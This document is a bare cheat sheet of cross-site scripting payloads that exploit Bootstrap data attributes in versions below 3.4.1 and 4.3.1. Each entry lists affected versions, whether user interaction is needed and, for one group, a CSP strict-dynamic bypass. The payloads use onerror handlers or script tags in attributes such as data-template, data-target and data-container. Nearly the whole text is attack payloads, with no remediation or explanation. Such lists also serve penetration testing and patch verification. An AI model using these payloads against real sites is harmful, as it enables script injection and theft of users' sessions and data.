Bootstrap < 3.4.1 || < 4.3.1
✔️ CSP strict-dynamic bypass
➖ Requires user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
<x data-toggle="tooltip" data-template="<img src=x onerror=alert(1)>">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
Bootstrap < 3.4.0
✔️ Without user interaction
<x data-spy="affix" data-target="<img src=x onerror=alert(1)>">
Bootstrap < 3.4.0
✔️ Without user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
<x data-toggle="tooltip" data-viewport="<img src=x onerror=alert(1) />">XSS</x>
Bootstrap < 3.4.0 || < 4.1.2
➖ Requires user interaction
<a id="x" data-toggle="collapse" href="#x" data-parent="<img src=x onerror=alert(1) />">XSS</a>
Bootstrap < 3.4.0 || < 4.1.2
✔️ Without user interaction
<x data-spy="scroll" data-target="<img src=x onerror=alert(1) />">XSS</x>
Bootstrap < 3.4.0 || < 4.1.2
➖ Requires user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
<x data-toggle="tooltip" data-container="<img src=x onerror=alert(1) />" title="x">XSS</x>
Bootstrap < 3.4.0 || v4.0.0-beta
➖ Requires user interaction
<x href="<img src=x onerror=alert(0)>" data-dismiss="alert">XSS</x>
<x data-toggle="collapse" data-target="<img src=x onerror=alert(1)>">XSS</x>
<x data-toggle="modal" data-target="<img src=x onerror=alert(2)>">XSS</x>
<x data-slide-to="0" data-target="<img src=x onerror=alert(3)>">XSS</x>
etc